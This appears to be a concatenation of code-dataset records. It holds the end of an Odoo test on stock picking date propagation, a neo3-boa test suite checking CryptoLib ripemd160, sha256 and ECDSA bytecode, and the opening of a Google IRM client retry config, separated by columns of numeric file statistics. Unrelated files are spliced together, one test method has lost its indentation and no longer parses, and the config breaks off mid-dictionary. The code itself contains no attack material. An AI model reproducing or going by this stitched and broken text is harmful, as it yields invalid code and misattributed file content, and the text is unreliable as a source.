        self.assertTrue(abs(pick_min_date - pick_date) <= timedelta(seconds=1), 'Schedule date of pick type picking should be equal to: Schedule date of pack type picking - pull rule delay.')
def test_02_if_propagate_date(self):
""" In order to check schedule dates, set product's Customer Lead Time
and warehouse route's delay with propagate True in stock rules"""
#Example :
#-> set 'propagate_date' = True in stock rules
#-> set propagate_date_minimum_delta = 5 days
#-> Set Warehouse with Outgoing Shipments : pick + pack + ship
#-> Set delay and propagate_date_minimum_delta on stock rules : 5 days and propagate_date = True
#-> Set Customer Lead Time on product : 30 days
#-> Create an SO and confirm it with confirmation Date : 12/18/2018
#-> Pickings : OUT -> Scheduled Date : 01/12/2019
# PACK -> Scheduled Date : 01/07/2019
# PICK -> Scheduled Date : 01/02/2019
#-> Now, change date of pick = +5 days
#-> Scheduled Date should be changed:
# OUT -> Scheduled Date : 01/17/2019
# PACK -> Scheduled Date : 01/12/2019
# PICK -> Scheduled Date : 01/07/2019
# set the propagate_date and
# set propagate_date_minimum_delta = 5 in the stock rule
# Update warehouse_1 with Outgoing Shippings pick + pack + ship
self.warehouse_1.write({'delivery_steps': 'pick_pack_ship'})
# Set delay on pull rule
self.warehouse_1.delivery_route_id.rule_ids.write({'delay': 5, 'propagate_date': True, 'propagate_date_minimum_delta': 5})
# Update the product_1 with type and Customer Lead Time
self.product_1.write({'type': 'product',
'sale_delay': 30.0})
# Now, create sale order of product_1 with customer_lead set on product
order = self.env['sale.order'].create({
'partner_id': self.partner_1.id,
'partner_invoice_id': self.partner_1.id,
'partner_shipping_id': self.partner_1.id,
'pricelist_id': self.env.ref('product.list0').id,
'picking_policy': 'direct',
'warehouse_id': self.warehouse_1.id,
'order_line': [(0, 0, {'name': self.product_1.name,
'product_id': self.product_1.id,
'product_uom_qty': 5,
'product_uom': self.uom_unit.id,
'customer_lead': self.product_1.sale_delay})]})
# Confirm our standard sale order
order.action_confirm()
# Check the picking crated or not
self.assertTrue(order.picking_ids, "Pickings should be created.")
# Check schedule date of ship type picking
out = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.out_type_id)
out_min_date = out.scheduled_date
out_date = order.date_order + timedelta(days=self.product_1.sale_delay) - timedelta(days=out.move_lines[0].rule_id.delay)
self.assertTrue(abs(out_min_date - out_date) <= timedelta(seconds=1), 'Schedule date of ship type picking should be equal to: order date + Customer Lead Time - pull rule delay.')
# Check schedule date of pack type picking
pack = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pack_type_id)
pack_min_date = pack.scheduled_date
pack_date = out_date - timedelta(days=pack.move_lines[0].rule_id.delay)
self.assertTrue(abs(pack_min_date - pack_date) <= timedelta(seconds=1), 'Schedule date of pack type picking should be equal to: Schedule date of ship type picking - pull rule delay.')
# Check schedule date of pick type picking
pick = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pick_type_id)
pick_min_date = pick.scheduled_date
pick_date = pack_date - timedelta(days=pick.move_lines[0].rule_id.delay)
self.assertTrue(abs(pick_min_date - pick_date) <= timedelta(seconds=1), 'Schedule date of pick type picking should be equal to: Schedule date of pack type picking - pull rule delay.')
# Now change the schedule date of pick
# Note : pack and out has change scheduled_date automatically based on delay set on pick
pick.write({'scheduled_date': pick_min_date + timedelta(days=5)})
# Now check scheduled_date of pack and out are changed or not based on propagate is true on rules?
self.assertEquals(pack.scheduled_date, (pack_min_date + timedelta(days=5)),
'Schedule date of pack should be changed based on delay.')
self.assertEquals(out.scheduled_date, (out_min_date + timedelta(days=5)),
'Schedule date of out should be changed based on delay.')
def test_03_no_propagate_date(self):
    """Check picking scheduled dates when stock rules do NOT propagate dates.

    Setup: warehouse delivery in 3 steps (pick + pack + ship), a 5-day
    delay on every pull rule with ``propagate_date=False``, and a 30-day
    customer lead time on the product.  After confirming a sale order,
    each picking's scheduled date must be staggered backwards by the rule
    delay; rescheduling the pick afterwards must leave pack and out
    untouched, because the rules do not propagate date changes.

    Fix note: ``assertEquals`` (deprecated alias, removed in Python 3.12)
    replaced by ``assertEqual``.
    """
    # Update warehouse_1 with Outgoing Shippings pick + pack + ship
    self.warehouse_1.write({'delivery_steps': 'pick_pack_ship'})
    # Set a 5-day delay on every pull rule, without date propagation.
    for pull_rule in self.warehouse_1.delivery_route_id.rule_ids:
        pull_rule.write({'delay': 5, 'propagate_date': False})
    # Make product_1 stockable with a 30-day Customer Lead Time.
    self.product_1.write({'type': 'product',
                          'sale_delay': 30.0})
    # Create a sale order of 5 units of product_1 on warehouse_1.
    order = self.env['sale.order'].create({
        'partner_id': self.partner_1.id,
        'partner_invoice_id': self.partner_1.id,
        'partner_shipping_id': self.partner_1.id,
        'pricelist_id': self.env.ref('product.list0').id,
        'picking_policy': 'direct',
        'warehouse_id': self.warehouse_1.id,
        'order_line': [(0, 0, {'name': self.product_1.name,
                               'product_id': self.product_1.id,
                               'product_uom_qty': 5,
                               'product_uom': self.uom_unit.id,
                               'customer_lead': self.product_1.sale_delay})]})
    # Confirm our standard sale order
    order.action_confirm()
    # Confirming the order must have created the picking chain.
    self.assertTrue(order.picking_ids, "Pickings should be created.")
    # Ship (OUT): order date + customer lead time - pull rule delay.
    out = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.out_type_id)
    out_min_date = out.scheduled_date
    out_date = order.date_order + timedelta(days=self.product_1.sale_delay) - timedelta(days=out.move_lines[0].rule_id.delay)
    self.assertTrue(abs(out_min_date - out_date) <= timedelta(seconds=1), 'Schedule date of ship type picking should be equal to: order date + Customer Lead Time - pull rule delay.')
    # Pack: ship scheduled date - pull rule delay.
    pack = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pack_type_id)
    pack_min_date = pack.scheduled_date
    pack_date = out_date - timedelta(days=pack.move_lines[0].rule_id.delay)
    self.assertTrue(abs(pack_min_date - pack_date) <= timedelta(seconds=1), 'Schedule date of pack type picking should be equal to: Schedule date of ship type picking - pull rule delay.')
    # Pick: pack scheduled date - pull rule delay.
    pick = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pick_type_id)
    pick_min_date = pick.scheduled_date
    pick_date = pack_date - timedelta(days=pick.move_lines[0].rule_id.delay)
    self.assertTrue(abs(pick_min_date - pick_date) <= timedelta(seconds=1), 'Schedule date of pick type picking should be equal to: Schedule date of pack type picking - pull rule delay.')
    # Reschedule the pick 5 days later; with propagate_date=False the
    # downstream pack/out pickings must keep their original dates.
    pick.write({'scheduled_date': pick_min_date + timedelta(days=5)})
    self.assertEqual(pack.scheduled_date, pack_min_date, 'Schedule date of pack should not be changed.')
    self.assertEqual(out.scheduled_date, out_min_date, 'Schedule date of out should not be changed.')
| 54.180077
| 191
| 0.639629
| 1,910
| 14,141
| 4.542408
| 0.081675
| 0.024896
| 0.051637
| 0.023974
| 0.903527
| 0.881512
| 0.853273
| 0.835178
| 0.809359
| 0.809359
| 0
| 0.023846
| 0.26455
| 14,141
| 260
| 192
| 54.388462
| 0.810385
| 0.255781
| 0
| 0.75969
| 0
| 0.069767
| 0.226043
| 0.002697
| 0
| 0
| 0
| 0
| 0.139535
| 1
| 0.03876
| false
| 0
| 0.023256
| 0
| 0.069767
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
45051ce9c2a245b0eb9d05224f7f026226f49745
| 18,489
|
py
|
Python
|
boa3_test/tests/compiler_tests/test_native/test_cryptolib.py
|
OnBlockIO/neo3-boa
|
cb317292a67532a52ed26f2b0f0f7d0b10ac5f5f
|
[
"Apache-2.0"
] | 25
|
2020-07-22T19:37:43.000Z
|
2022-03-08T03:23:55.000Z
|
boa3_test/tests/compiler_tests/test_native/test_cryptolib.py
|
OnBlockIO/neo3-boa
|
cb317292a67532a52ed26f2b0f0f7d0b10ac5f5f
|
[
"Apache-2.0"
] | 419
|
2020-04-23T17:48:14.000Z
|
2022-03-31T13:17:45.000Z
|
boa3_test/tests/compiler_tests/test_native/test_cryptolib.py
|
OnBlockIO/neo3-boa
|
cb317292a67532a52ed26f2b0f0f7d0b10ac5f5f
|
[
"Apache-2.0"
] | 15
|
2020-05-21T21:54:24.000Z
|
2021-11-18T06:17:24.000Z
|
import hashlib
from boa3 import constants
from boa3.boa3 import Boa3
from boa3.exception import CompilerError
from boa3.model.builtin.interop.interop import Interop
from boa3.model.type.type import Type
from boa3.neo.vm.opcode.Opcode import Opcode
from boa3.neo.vm.type.Integer import Integer
from boa3.neo.vm.type.String import String
from boa3.neo3.contracts.contracttypes import CallFlags
from boa3.neo3.contracts.namedcurve import NamedCurve
from boa3_test.tests.boa_test import BoaTest
from boa3_test.tests.test_classes.testengine import TestEngine
class TestCryptoLibClass(BoaTest):
    """Compiler tests for the CryptoLib native contract interops.

    The hash tests (ripemd160 / sha256) execute the compiled contract in
    a TestEngine and compare the result against Python's hashlib.  The
    ECDSA tests compare the compiled bytecode byte-for-byte against a
    hand-built opcode sequence that calls the CryptoLib contract.
    """
    default_folder: str = 'test_sc/native_test/cryptolib'
    # Opcode prelude validating an ECPoint argument: a null value is
    # accepted as-is (JMPIF skips the check); otherwise the byte length
    # must be exactly 33, else the script throws.
    ecpoint_init = (
        Opcode.CONVERT + Type.bytes.stack_item
        + Opcode.DUP
        + Opcode.ISNULL
        + Opcode.JMPIF + Integer(8).to_byte_array()
        + Opcode.DUP
        + Opcode.SIZE
        + Opcode.PUSHINT8 + Integer(33).to_byte_array(signed=True)
        + Opcode.JMPEQ + Integer(3).to_byte_array()
        + Opcode.THROW
    )

    def test_ripemd160_str(self):
        """ripemd160 of a str argument matches hashlib (incl. empty string)."""
        path = self.get_contract_path('Ripemd160Str.py')
        engine = TestEngine()
        expected_result = hashlib.new('ripemd160', b'unit test')
        result = self.run_smart_contract(engine, path, 'Main', 'unit test')
        self.assertEqual(expected_result.digest(), result)
        expected_result = hashlib.new('ripemd160', b'')
        result = self.run_smart_contract(engine, path, 'Main', '')
        self.assertEqual(expected_result.digest(), result)

    def test_ripemd160_int(self):
        """ripemd160 of an int is hashed over its little-endian bytes."""
        path = self.get_contract_path('Ripemd160Int.py')
        engine = TestEngine()
        expected_result = hashlib.new('ripemd160', Integer(10).to_byte_array())
        result = self.run_smart_contract(engine, path, 'Main')
        self.assertEqual(expected_result.digest(), result)

    def test_ripemd160_bool(self):
        """ripemd160 of a bool is hashed over its single-byte encoding."""
        path = self.get_contract_path('Ripemd160Bool.py')
        engine = TestEngine()
        expected_result = hashlib.new('ripemd160', Integer(1).to_byte_array())
        result = self.run_smart_contract(engine, path, 'Main')
        self.assertEqual(expected_result.digest(), result)

    def test_ripemd160_bytes(self):
        """ripemd160 of a bytes argument matches hashlib."""
        path = self.get_contract_path('Ripemd160Bytes.py')
        engine = TestEngine()
        expected_result = hashlib.new('ripemd160', b'unit test')
        result = self.run_smart_contract(engine, path, 'Main')
        self.assertEqual(expected_result.digest(), result)

    def test_ripemd160_too_many_parameters(self):
        """Extra argument to ripemd160 must fail compilation."""
        path = self.get_contract_path('Ripemd160TooManyArguments.py')
        self.assertCompilerLogs(CompilerError.UnexpectedArgument, path)

    def test_ripemd160_too_few_parameters(self):
        """Missing argument to ripemd160 must fail compilation."""
        path = self.get_contract_path('Ripemd160TooFewArguments.py')
        self.assertCompilerLogs(CompilerError.UnfilledArgument, path)

    def test_sha256_str(self):
        """sha256 of a str argument matches hashlib (incl. empty string)."""
        path = self.get_contract_path('Sha256Str.py')
        engine = TestEngine()
        expected_result = hashlib.sha256(b'unit test')
        result = self.run_smart_contract(engine, path, 'Main', 'unit test')
        self.assertEqual(expected_result.digest(), result)
        expected_result = hashlib.sha256(b'')
        result = self.run_smart_contract(engine, path, 'Main', '')
        self.assertEqual(expected_result.digest(), result)

    def test_sha256_int(self):
        """sha256 of an int is hashed over its little-endian bytes."""
        path = self.get_contract_path('Sha256Int.py')
        engine = TestEngine()
        expected_result = hashlib.sha256(Integer(10).to_byte_array())
        result = self.run_smart_contract(engine, path, 'Main')
        self.assertEqual(expected_result.digest(), result)

    def test_sha256_bool(self):
        """sha256 of a bool is hashed over its single-byte encoding."""
        path = self.get_contract_path('Sha256Bool.py')
        engine = TestEngine()
        expected_result = hashlib.sha256(Integer(1).to_byte_array())
        result = self.run_smart_contract(engine, path, 'Main')
        self.assertEqual(expected_result.digest(), result)

    def test_sha256_bytes(self):
        """sha256 of a bytes argument matches hashlib."""
        path = self.get_contract_path('Sha256Bytes.py')
        engine = TestEngine()
        expected_result = hashlib.sha256(b'unit test')
        result = self.run_smart_contract(engine, path, 'Main')
        self.assertEqual(expected_result.digest(), result)

    def test_sha256_too_many_parameters(self):
        """Extra argument to sha256 must fail compilation."""
        path = self.get_contract_path('Sha256TooManyArguments.py')
        self.assertCompilerLogs(CompilerError.UnexpectedArgument, path)

    def test_sha256_too_few_parameters(self):
        """Missing argument to sha256 must fail compilation."""
        path = self.get_contract_path('Sha256TooFewArguments.py')
        self.assertCompilerLogs(CompilerError.UnfilledArgument, path)

    def test_verify_with_ecdsa(self):
        """verify_with_ecdsa contract must at least compile."""
        path = self.get_contract_path('VerifyWithECDsa.py')
        Boa3.compile(path)

    def test_verify_with_ecdsa_secp256r1_str(self):
        """Compiled bytecode for verify_with_ecdsa(str, ..., SECP256R1).

        Expected layout: push the call arguments in reverse (curve,
        signature, pubkey with ECPoint validation, message), PACK them,
        then call the CryptoLib contract via System.Contract.Call.
        """
        byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
        byte_input2 = b'signature'
        string = b'unit test'
        named_curve = Integer(NamedCurve.SECP256R1).to_byte_array(signed=True, min_length=1)
        function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
        call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
        expected_output = (
            Opcode.PUSHDATA1
            + Integer(len(named_curve)).to_byte_array(min_length=1)
            + named_curve
            + Opcode.CONVERT + Type.int.stack_item
            + Opcode.PUSHDATA1
            + Integer(len(byte_input2)).to_byte_array(min_length=1)
            + byte_input2
            + Opcode.PUSHDATA1
            + Integer(len(byte_input1)).to_byte_array(min_length=1)
            + byte_input1
            + self.ecpoint_init
            + Opcode.PUSHDATA1
            + Integer(len(string)).to_byte_array(min_length=1)
            + string
            + Opcode.PUSH4
            + Opcode.PACK
            + Opcode.PUSHDATA1
            + Integer(len(call_flag)).to_byte_array(min_length=1)
            + call_flag
            + Opcode.PUSHDATA1
            + Integer(len(function_id)).to_byte_array() + function_id
            + Opcode.PUSHDATA1
            + Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
            + Opcode.SYSCALL
            + Interop.CallContract.interop_method_hash
            + Opcode.DROP
            + Opcode.RET
        )
        path = self.get_contract_path('VerifyWithECDsaSecp256r1Str.py')
        output = Boa3.compile(path)
        self.assertEqual(expected_output, output)

    def test_verify_with_ecdsa_secp256r1_bool(self):
        """Same as the str variant, message pushed as PUSH0 (False)."""
        byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
        byte_input2 = b'signature'
        named_curve = Integer(NamedCurve.SECP256R1).to_byte_array(signed=True, min_length=1)
        function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
        call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
        expected_output = (
            Opcode.PUSHDATA1
            + Integer(len(named_curve)).to_byte_array(min_length=1)
            + named_curve
            + Opcode.CONVERT + Type.int.stack_item
            + Opcode.PUSHDATA1
            + Integer(len(byte_input2)).to_byte_array(min_length=1)
            + byte_input2
            + Opcode.PUSHDATA1
            + Integer(len(byte_input1)).to_byte_array(min_length=1)
            + byte_input1
            + self.ecpoint_init
            + Opcode.PUSH0
            + Opcode.PUSH4
            + Opcode.PACK
            + Opcode.PUSHDATA1
            + Integer(len(call_flag)).to_byte_array(min_length=1)
            + call_flag
            + Opcode.PUSHDATA1
            + Integer(len(function_id)).to_byte_array() + function_id
            + Opcode.PUSHDATA1
            + Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
            + Opcode.SYSCALL
            + Interop.CallContract.interop_method_hash
            + Opcode.DROP
            + Opcode.RET
        )
        path = self.get_contract_path('VerifyWithECDsaSecp256r1Bool.py')
        output = Boa3.compile(path)
        self.assertEqual(expected_output, output)

    def test_verify_with_ecdsa_secp256r1_int(self):
        """Same as the str variant, message pushed as PUSH10 (int 10)."""
        byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
        byte_input2 = b'signature'
        named_curve = Integer(NamedCurve.SECP256R1).to_byte_array(signed=True, min_length=1)
        function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
        call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
        expected_output = (
            Opcode.PUSHDATA1
            + Integer(len(named_curve)).to_byte_array(min_length=1)
            + named_curve
            + Opcode.CONVERT + Type.int.stack_item
            + Opcode.PUSHDATA1
            + Integer(len(byte_input2)).to_byte_array(min_length=1)
            + byte_input2
            + Opcode.PUSHDATA1
            + Integer(len(byte_input1)).to_byte_array(min_length=1)
            + byte_input1
            + self.ecpoint_init
            + Opcode.PUSH10
            + Opcode.PUSH4
            + Opcode.PACK
            + Opcode.PUSHDATA1
            + Integer(len(call_flag)).to_byte_array(min_length=1)
            + call_flag
            + Opcode.PUSHDATA1
            + Integer(len(function_id)).to_byte_array() + function_id
            + Opcode.PUSHDATA1
            + Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
            + Opcode.SYSCALL
            + Interop.CallContract.interop_method_hash
            + Opcode.DROP
            + Opcode.RET
        )
        path = self.get_contract_path('VerifyWithECDsaSecp256r1Int.py')
        output = Boa3.compile(path)
        self.assertEqual(expected_output, output)

    def test_verify_with_ecdsa_secp256r1_bytes(self):
        """Same as the str variant, message pushed as a bytes literal."""
        byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
        byte_input2 = b'signature'
        string = b'unit test'
        named_curve = Integer(NamedCurve.SECP256R1).to_byte_array(signed=True, min_length=1)
        function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
        call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
        expected_output = (
            Opcode.PUSHDATA1
            + Integer(len(named_curve)).to_byte_array(min_length=1)
            + named_curve
            + Opcode.CONVERT + Type.int.stack_item
            + Opcode.PUSHDATA1
            + Integer(len(byte_input2)).to_byte_array(min_length=1)
            + byte_input2
            + Opcode.PUSHDATA1
            + Integer(len(byte_input1)).to_byte_array(min_length=1)
            + byte_input1
            + self.ecpoint_init
            + Opcode.PUSHDATA1
            + Integer(len(string)).to_byte_array(min_length=1)
            + string
            + Opcode.PUSH4
            + Opcode.PACK
            + Opcode.PUSHDATA1
            + Integer(len(call_flag)).to_byte_array(min_length=1)
            + call_flag
            + Opcode.PUSHDATA1
            + Integer(len(function_id)).to_byte_array() + function_id
            + Opcode.PUSHDATA1
            + Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
            + Opcode.SYSCALL
            + Interop.CallContract.interop_method_hash
            + Opcode.DROP
            + Opcode.RET
        )
        path = self.get_contract_path('VerifyWithECDsaSecp256r1Bytes.py')
        output = Boa3.compile(path)
        self.assertEqual(expected_output, output)

    def test_verify_with_ecdsa_secp256r1_mismatched_type(self):
        """Wrong argument type for verify_with_ecdsa must fail compilation."""
        path = self.get_contract_path('VerifyWithECDsaSecp256r1MismatchedType.py')
        self.assertCompilerLogs(CompilerError.MismatchedTypes, path)

    def test_verify_with_ecdsa_secp256k1_str(self):
        """SECP256K1 variant of the str bytecode test.

        NOTE(review): unlike the secp256r1 tests, the call_flag length
        here uses to_byte_array() without min_length=1 — presumably
        equivalent for CallFlags.ALL (one byte); confirm intent.
        """
        byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
        byte_input2 = b'signature'
        string = b'unit test'
        named_curve = Integer(NamedCurve.SECP256K1).to_byte_array(signed=True, min_length=1)
        function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
        call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
        expected_output = (
            Opcode.PUSHDATA1
            + Integer(len(named_curve)).to_byte_array(min_length=1)
            + named_curve
            + Opcode.CONVERT + Type.int.stack_item
            + Opcode.PUSHDATA1
            + Integer(len(byte_input2)).to_byte_array(min_length=1)
            + byte_input2
            + Opcode.PUSHDATA1
            + Integer(len(byte_input1)).to_byte_array(min_length=1)
            + byte_input1
            + self.ecpoint_init
            + Opcode.PUSHDATA1
            + Integer(len(string)).to_byte_array(min_length=1)
            + string
            + Opcode.PUSH4
            + Opcode.PACK
            + Opcode.PUSHDATA1
            + Integer(len(call_flag)).to_byte_array() + call_flag
            + Opcode.PUSHDATA1
            + Integer(len(function_id)).to_byte_array() + function_id
            + Opcode.PUSHDATA1
            + Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
            + Opcode.SYSCALL
            + Interop.CallContract.interop_method_hash
            + Opcode.DROP
            + Opcode.RET
        )
        path = self.get_contract_path('VerifyWithECDsaSecp256k1Str.py')
        output = Boa3.compile(path)
        self.assertEqual(expected_output, output)

    def test_verify_with_ecdsa_secp256k1_bool(self):
        """SECP256K1 variant, message pushed as PUSH0 (False)."""
        byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
        byte_input2 = b'signature'
        named_curve = Integer(NamedCurve.SECP256K1).to_byte_array(signed=True, min_length=1)
        function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
        call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
        expected_output = (
            Opcode.PUSHDATA1
            + Integer(len(named_curve)).to_byte_array(min_length=1)
            + named_curve
            + Opcode.CONVERT + Type.int.stack_item
            + Opcode.PUSHDATA1
            + Integer(len(byte_input2)).to_byte_array(min_length=1)
            + byte_input2
            + Opcode.PUSHDATA1
            + Integer(len(byte_input1)).to_byte_array(min_length=1)
            + byte_input1
            + self.ecpoint_init
            + Opcode.PUSH0
            + Opcode.PUSH4
            + Opcode.PACK
            + Opcode.PUSHDATA1
            + Integer(len(call_flag)).to_byte_array() + call_flag
            + Opcode.PUSHDATA1
            + Integer(len(function_id)).to_byte_array() + function_id
            + Opcode.PUSHDATA1
            + Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
            + Opcode.SYSCALL
            + Interop.CallContract.interop_method_hash
            + Opcode.DROP
            + Opcode.RET
        )
        path = self.get_contract_path('VerifyWithECDsaSecp256k1Bool.py')
        output = Boa3.compile(path)
        self.assertEqual(expected_output, output)

    def test_verify_with_ecdsa_secp256k1_int(self):
        """SECP256K1 variant, message pushed as PUSH10 (int 10)."""
        byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
        byte_input2 = b'signature'
        named_curve = Integer(NamedCurve.SECP256K1).to_byte_array(signed=True, min_length=1)
        function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
        call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
        expected_output = (
            Opcode.PUSHDATA1
            + Integer(len(named_curve)).to_byte_array(min_length=1)
            + named_curve
            + Opcode.CONVERT + Type.int.stack_item
            + Opcode.PUSHDATA1
            + Integer(len(byte_input2)).to_byte_array(min_length=1)
            + byte_input2
            + Opcode.PUSHDATA1
            + Integer(len(byte_input1)).to_byte_array(min_length=1)
            + byte_input1
            + self.ecpoint_init
            + Opcode.PUSH10
            + Opcode.PUSH4
            + Opcode.PACK
            + Opcode.PUSHDATA1
            + Integer(len(call_flag)).to_byte_array() + call_flag
            + Opcode.PUSHDATA1
            + Integer(len(function_id)).to_byte_array() + function_id
            + Opcode.PUSHDATA1
            + Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
            + Opcode.SYSCALL
            + Interop.CallContract.interop_method_hash
            + Opcode.DROP
            + Opcode.RET
        )
        path = self.get_contract_path('VerifyWithECDsaSecp256k1Int.py')
        output = Boa3.compile(path)
        self.assertEqual(expected_output, output)

    def test_verify_with_ecdsa_secp256k1_bytes(self):
        """SECP256K1 variant, message pushed as a bytes literal."""
        byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
        byte_input2 = b'signature'
        string = b'unit test'
        named_curve = Integer(NamedCurve.SECP256K1).to_byte_array(signed=True, min_length=1)
        function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
        call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
        expected_output = (
            Opcode.PUSHDATA1
            + Integer(len(named_curve)).to_byte_array(min_length=1)
            + named_curve
            + Opcode.CONVERT + Type.int.stack_item
            + Opcode.PUSHDATA1
            + Integer(len(byte_input2)).to_byte_array(min_length=1)
            + byte_input2
            + Opcode.PUSHDATA1
            + Integer(len(byte_input1)).to_byte_array(min_length=1)
            + byte_input1
            + self.ecpoint_init
            + Opcode.PUSHDATA1
            + Integer(len(string)).to_byte_array(min_length=1)
            + string
            + Opcode.PUSH4
            + Opcode.PACK
            + Opcode.PUSHDATA1
            + Integer(len(call_flag)).to_byte_array() + call_flag
            + Opcode.PUSHDATA1
            + Integer(len(function_id)).to_byte_array() + function_id
            + Opcode.PUSHDATA1
            + Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
            + Opcode.SYSCALL
            + Interop.CallContract.interop_method_hash
            + Opcode.DROP
            + Opcode.RET
        )
        path = self.get_contract_path('VerifyWithECDsaSecp256k1Bytes.py')
        output = Boa3.compile(path)
        self.assertEqual(expected_output, output)

    def test_verify_with_ecdsa_secp256k1_mismatched_type(self):
        """Wrong argument type for verify_with_ecdsa must fail compilation."""
        path = self.get_contract_path('VerifyWithECDsaSecp256k1MismatchedType.py')
        self.assertCompilerLogs(CompilerError.MismatchedTypes, path)
| 41.735892
| 93
| 0.641733
| 2,051
| 18,489
| 5.498294
| 0.071185
| 0.039904
| 0.073158
| 0.115279
| 0.891283
| 0.885874
| 0.865301
| 0.843487
| 0.805179
| 0.780704
| 0
| 0.036081
| 0.26248
| 18,489
| 442
| 94
| 41.830317
| 0.790921
| 0
| 0
| 0.785894
| 0
| 0
| 0.059711
| 0.039213
| 0
| 0
| 0
| 0
| 0.060453
| 1
| 0.057935
| false
| 0
| 0.032746
| 0
| 0.098237
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4512724738ffab84e8982d9c40bc09c650e381b5
| 7,519
|
py
|
Python
|
google/cloud/irm_v1alpha2/gapic/incident_service_client_config.py
|
renovate-bot/python-irm
|
9006000797ef55bcba14e8cb156e4430645a2c9e
|
[
"Apache-2.0"
] | 2
|
2021-06-04T06:16:05.000Z
|
2021-10-07T21:29:26.000Z
|
google/cloud/irm_v1alpha2/gapic/incident_service_client_config.py
|
renovate-bot/python-irm
|
9006000797ef55bcba14e8cb156e4430645a2c9e
|
[
"Apache-2.0"
] | 40
|
2019-07-16T10:04:48.000Z
|
2020-01-20T09:04:59.000Z
|
google/cloud/irm_v1alpha2/gapic/incident_service_client_config.py
|
renovate-bot/python-irm
|
9006000797ef55bcba14e8cb156e4430645a2c9e
|
[
"Apache-2.0"
] | 4
|
2020-02-08T13:52:01.000Z
|
2020-11-03T11:02:29.000Z
|
def _method_entry(retry_codes_name):
    """Build one per-method config entry with the shared 60s timeout."""
    return {
        "timeout_millis": 60000,
        "retry_codes_name": retry_codes_name,
        "retry_params_name": "default",
    }


# (method name, retry-codes class), kept in the service's declaration order.
_METHOD_RETRY_CLASSES = [
    ("DeleteArtifact", "idempotent"),
    ("RequestIncidentRoleHandover", "non_idempotent"),
    ("ConfirmIncidentRoleHandover", "non_idempotent"),
    ("ForceIncidentRoleHandover", "non_idempotent"),
    ("CreateIncident", "non_idempotent"),
    ("GetIncident", "idempotent"),
    ("SearchIncidents", "idempotent"),
    ("UpdateIncident", "non_idempotent"),
    ("SearchSimilarIncidents", "idempotent"),
    ("CreateAnnotation", "non_idempotent"),
    ("ListAnnotations", "idempotent"),
    ("CreateTag", "non_idempotent"),
    ("DeleteTag", "non_idempotent"),
    ("ListTags", "idempotent"),
    ("CreateSignal", "non_idempotent"),
    ("SearchSignals", "idempotent"),
    ("LookupSignal", "idempotent"),
    ("GetSignal", "idempotent"),
    ("UpdateSignal", "non_idempotent"),
    ("EscalateIncident", "non_idempotent"),
    ("CreateArtifact", "non_idempotent"),
    ("ListArtifacts", "idempotent"),
    ("UpdateArtifact", "non_idempotent"),
    ("SendShiftHandoff", "non_idempotent"),
    ("CreateSubscription", "non_idempotent"),
    ("UpdateSubscription", "non_idempotent"),
    ("ListSubscriptions", "idempotent"),
    ("DeleteSubscription", "non_idempotent"),
    ("CreateIncidentRoleAssignment", "non_idempotent"),
    ("DeleteIncidentRoleAssignment", "non_idempotent"),
    ("ListIncidentRoleAssignments", "idempotent"),
    ("CancelIncidentRoleHandover", "non_idempotent"),
]

# GAPIC client retry/timeout configuration for the IRM IncidentService.
config = {
    "interfaces": {
        "google.cloud.irm.v1alpha2.IncidentService": {
            "retry_codes": {
